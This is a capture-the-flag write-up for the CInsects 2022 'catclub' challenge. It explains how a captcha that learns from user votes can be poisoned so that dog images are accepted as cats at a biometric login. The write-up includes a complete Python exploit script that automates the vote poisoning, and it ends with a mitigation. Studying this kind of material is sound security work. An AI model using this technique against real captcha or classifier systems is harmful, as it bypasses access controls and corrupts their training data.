CInsects CTF 2022 - catclub

Trick the captcha into believing that a dog is actually a cat, so that the dog is let into the catclub.

The catclub challenge is written in Python. It offers the shadymail service, which can be accessed after an image captcha is solved, and a hidden catclub page that shows pictures of random cats.

Service Overview

  • The home page, which consists of a captcha where all images of a specific animal must be selected to proceed (/)
  • The shadymail service which can be accessed after completing a captcha (/shadymail/home)
  • The catclub page where random cat images from the internet are displayed (/catclub/images)
  • A login page with a login form and an image upload. The upload acts as a login (biometric check) if one uploads a dog image that the captcha algorithm classifies as a cat (/catclub/login)
  • The flag page, where people who passed the fake cat login can leave a message (/catclub/login; logged in as dog)

Vulnerability

The goal is to access the page where people can leave comments (flag page). To access this page one has to pass the biometric check as a dog that is classified as a cat.

This is usually impossible because only cats get classified as cats. The vulnerability in this service lies in the fact that the captcha learns which images are cats from user input.

Code excerpt from the captcha service:

# Check if the accuracy is high enough
if accuracy > ACCURACY_TRESH:  # passes captcha
    # Save class votes in user votes
    for image in session["images"]:
        if image in data["clicked_images"]:
            value = 1
        else:
            value = -1
        # Get previous user voting if it exists
        previous_value = int(db.hgetall(f'uservote:{image}').get(goal_class, 0))
        # Write new value to db (saves a vote for every image shown in the captcha)
        db.hset(f'uservote:{image}', goal_class, previous_value + value)

The problem with this algorithm is that it is not exact: it uses an accuracy threshold to decide whether a captcha is solved. Because of this, we can call the captcha service over and over again, select all cat images plus a few dog images so that the captcha still passes, and thereby get dogs marked as cats.
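The effect of the threshold can be illustrated offline. The following is a minimal sketch, not the service's code: the threshold value 0.75, the accuracy formula (fraction of shown images whose clicked state matches the true label), and the helper names accuracy, max_smuggled and submit are all assumptions, and an in-memory dict stands in for the Redis db from the excerpt.

```python
from collections import defaultdict

ACCURACY_THRESHOLD = 0.75  # assumed value; the real ACCURACY_TRESH is not shown


def accuracy(shown, clicked, labels, goal_class):
    """Assumed metric: share of images whose clicked state matches the label."""
    correct = sum((labels[img] == goal_class) == (img in clicked) for img in shown)
    return correct / len(shown)


def max_smuggled(n_shown, threshold):
    """Largest number of wrong clicks that keeps accuracy above the threshold."""
    wrong = 0
    while (n_shown - (wrong + 1)) / n_shown > threshold:
        wrong += 1
    return wrong


def submit(votes, shown, clicked, labels, goal_class):
    """Mimic the excerpt: store +1/-1 votes only when the captcha passes."""
    if accuracy(shown, clicked, labels, goal_class) <= ACCURACY_THRESHOLD:
        return False
    for img in shown:
        votes[img][goal_class] += 1 if img in clicked else -1
    return True


# Hypothetical captcha with four cats and six dogs
labels = {f"cat{i}": "cat" for i in range(4)}
labels.update({f"dog{i}": "dog" for i in range(6)})
shown = list(labels)
votes = defaultdict(lambda: defaultdict(int))  # stand-in for the uservote hashes

budget = max_smuggled(len(shown), ACCURACY_THRESHOLD)
cats = {img for img in shown if labels[img] == "cat"}
clicked = cats | {f"dog{i}" for i in range(budget)}

for _ in range(100):
    submit(votes, shown, clicked, labels, "cat")

print(budget, votes["dog0"]["cat"], votes["dog5"]["cat"])  # 2 100 -100
```

Under these assumptions, every passing submission pushes the "cat" vote of the smuggled dogs up by one, while the honestly skipped dogs drift the other way.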

Exploit

As the base of the exploit I used the preparedata.py file from the source of the service, which loads all animal images together with their true labels.

I then use this ground truth and compare it with the images I get from the "/" endpoint (captcha). I select all cats and a few dogs, so that I still pass the accuracy threshold, and send the attempt to "/captchaaas/validate". After a few hundred iterations enough dogs have been smuggled in as cats, and I can use these misclassified dogs to circumvent the biometric verification check on "/catclub/login".

After that I can simply use a dog to log in on "/catclub/login", where the page detects that I am a dog that got classified as a cat and displays all messages left by people who got here first (including flags).

import string
import pickle
import random
import requests
from PIL import Image
from io import BytesIO
from urllib.parse import quote
from base64 import b64encode
from bs4 import BeautifulSoup

# Load image data and labels
def unpickle(file):
    with open(file, 'rb') as fo:
        # Avoid shadowing the built-in dict
        contents = pickle.load(fo, encoding='latin1')
    return contents

data_batch_1 = unpickle("data_batch_1")
meta = unpickle("batches.meta")

labels = data_batch_1['labels']
images = data_batch_1['data']

print(f"Available classes: {meta['label_names']}")

classes = ["bird", "cat", "deer", "dog", "frog", "horse"]

print(f"Selected classes: {classes}")
print(f"Unavailable classes: {list(set(classes) - set(meta['label_names']))}")

used_class_indices = [meta['label_names'].index(class_name) for class_name in classes]

# Map each encoded image to its true label and to the image object itself
pickle_contents = {}
pickle_images = {}
for idx, image in enumerate(images):
    label = labels[idx]
    if label in used_class_indices:
        # Each row holds 3 colour planes of 32x32 pixels; convert to height x width x channel
        image = image.reshape(3,32,32).transpose(1,2,0)
        image = Image.fromarray(image)
        byte_io = BytesIO()
        image.save(byte_io, 'png')
        # The URL-quoted base64 PNG is the key used to match images from the captcha page
        data = quote(b64encode(byte_io.getvalue()).decode('ascii'))
        pickle_contents[data]= meta['label_names'][label]
        pickle_images[data] = image


used_dogs = []

# Call the captcha service over and over again, select all cats plus a few dogs
for i in range(500):
    id = ""
    while True:
        r = requests.get('http://localhost')
        soup = BeautifulSoup(r.text, 'html.parser')
        id = soup.find_all("div", {"class": "captcha_image_card"})[0].get("id")
        # Only smuggle dogs in captchas where cats must be selected
        if str(soup.find_all('b')[0])=="<b>cat!</b>":
            break

    print(i)
    cats = []
    dogs = []
    for img in soup.find_all('img'):
        # Drop the first 23 characters of src to get the key used in pickle_contents
        key = img.get('src')[23:]
        # .get avoids a KeyError for images that are not in the loaded batch
        label = pickle_contents.get(key)
        if label == "cat":
            cats.append(img.get("id"))
        elif label == "dog":
            dogs.append(img.get("id"))
            # Save the dog image to disk for the later login step
            pickle_images[key].save("chosen/dogs-"+img.get("id")+".png", 'png')

    # Count how often each dog has already been smuggled in earlier rounds
    stats = [[x,used_dogs.count(x)] for x in set(used_dogs)]

    # Keep only previously used dogs that appear in this captcha, most used first
    intersection = [item for item in stats if item[0] in dogs]
    intersection.sort(key=lambda tup: tup[1],reverse=True)
    # Select up to three dogs, preferring those with the most hits
    known = [item[0] for item in intersection[0:3]]
    # Fill the remaining slots with dogs from this captcha that were not picked yet
    # (the original filter here always produced an empty list)
    fresh = [dog for dog in dogs if dog not in known]
    sel_dogs = known + fresh[0:3-len(known)]


    myobj = {'clicked_images': cats+sel_dogs,"id":id}
    used_dogs = used_dogs+sel_dogs
    # send the captcha with the smuggled dogs to the captcha endpoint
    x = requests.post("http://localhost/captchaaas/validate", json = myobj)

# output dogs which are classified the most as cats
stats = [[x,used_dogs.count(x)] for x in set(used_dogs)]
stats.sort(key=lambda tup: tup[1], reverse=True)
print(stats[0:10])

Possible mitigation

Disable the learning feature and just use the label database for verification of captchas instead.
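A minimal sketch of such a check is shown below. It assumes a fixed label lookup (here a plain dict) and a hypothetical function name validate_captcha; neither is taken from the service. Requiring an exact match is an extra design choice on top of the mitigation above, since it also removes the error budget that the accuracy threshold allowed.

```python
def validate_captcha(shown, clicked, labels, goal_class):
    """Pass only if the clicked set equals the images labelled goal_class.

    Nothing is written back, so user input cannot change future classifications.
    """
    expected = {img for img in shown if labels.get(img) == goal_class}
    return set(clicked) == expected


# Hypothetical label database and captcha contents
labels = {"a": "cat", "b": "dog", "c": "cat"}
shown = ["a", "b", "c"]

print(validate_captcha(shown, ["a", "c"], labels, "cat"))       # True
print(validate_captcha(shown, ["a", "b", "c"], labels, "cat"))  # False
```

If some tolerance for human error is still wanted, a threshold could be kept for the pass/fail decision as long as the submitted clicks are never stored as votes.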

